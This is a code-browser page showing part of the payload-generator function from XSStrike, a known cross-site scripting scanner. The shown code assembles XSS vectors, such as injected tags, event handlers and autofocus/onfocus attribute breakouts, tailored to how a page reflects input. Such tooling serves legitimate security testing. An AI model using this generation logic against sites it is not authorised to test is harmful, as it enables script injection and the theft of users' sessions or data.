MCPcopy
hub / github.com/s0md3v/XSStrike / generator

Function generator

core/generator.py:6–172  ·  view source on GitHub ↗
(occurences, response)

Source from the content-addressed store, hash-verified

4
5
6def generator(occurences, response):
7 scripts = extractScripts(response)
8 index = 0
9 vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
10 6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
11 for i in occurences:
12 context = occurences[i]['context']
13 if context == 'html':
14 lessBracketEfficiency = occurences[i]['score']['<']
15 greatBracketEfficiency = occurences[i]['score']['>']
16 ends = ['//']
17 badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
18 if greatBracketEfficiency == 100:
19 ends.append('>')
20 if lessBracketEfficiency:
21 payloads = genGen(fillings, eFillings, lFillings,
22 eventHandlers, tags, functions, ends, badTag)
23 for payload in payloads:
24 vectors[10].add(payload)
25 elif context == 'attribute':
26 found = False
27 tag = occurences[i]['details']['tag']
28 Type = occurences[i]['details']['type']
29 quote = occurences[i]['details']['quote'] or ''
30 attributeName = occurences[i]['details']['name']
31 attributeValue = occurences[i]['details']['value']
32 quoteEfficiency = occurences[i]['score'][quote] if quote in occurences[i]['score'] else 100
33 greatBracketEfficiency = occurences[i]['score']['>']
34 ends = ['//']
35 if greatBracketEfficiency == 100:
36 ends.append('>')
37 if greatBracketEfficiency == 100 and quoteEfficiency == 100:
38 payloads = genGen(fillings, eFillings, lFillings,
39 eventHandlers, tags, functions, ends)
40 for payload in payloads:
41 payload = quote + '>' + payload
42 found = True
43 vectors[9].add(payload)
44 if quoteEfficiency == 100:
45 for filling in fillings:
46 for function in functions:
47 vector = quote + filling + r('autofocus') + \
48 filling + r('onfocus') + '=' + quote + function
49 found = True
50 vectors[8].add(vector)
51 if quoteEfficiency == 90:
52 for filling in fillings:
53 for function in functions:
54 vector = '\\' + quote + filling + r('autofocus') + filling + \
55 r('onfocus') + '=' + function + filling + '\\' + quote
56 found = True
57 vectors[7].add(vector)
58 if Type == 'value':
59 if attributeName == 'srcdoc':
60 if occurences[i]['score']['&lt;']:
61 if occurences[i]['score']['&gt;']:
62 del ends[:]
63 ends.append('%26gt;')

Callers 2

crawlFunction · 0.90
scanFunction · 0.90

Calls 3

extractScriptsFunction · 0.90
genGenFunction · 0.90
jsContexterFunction · 0.90

Tested by

no test coverage detected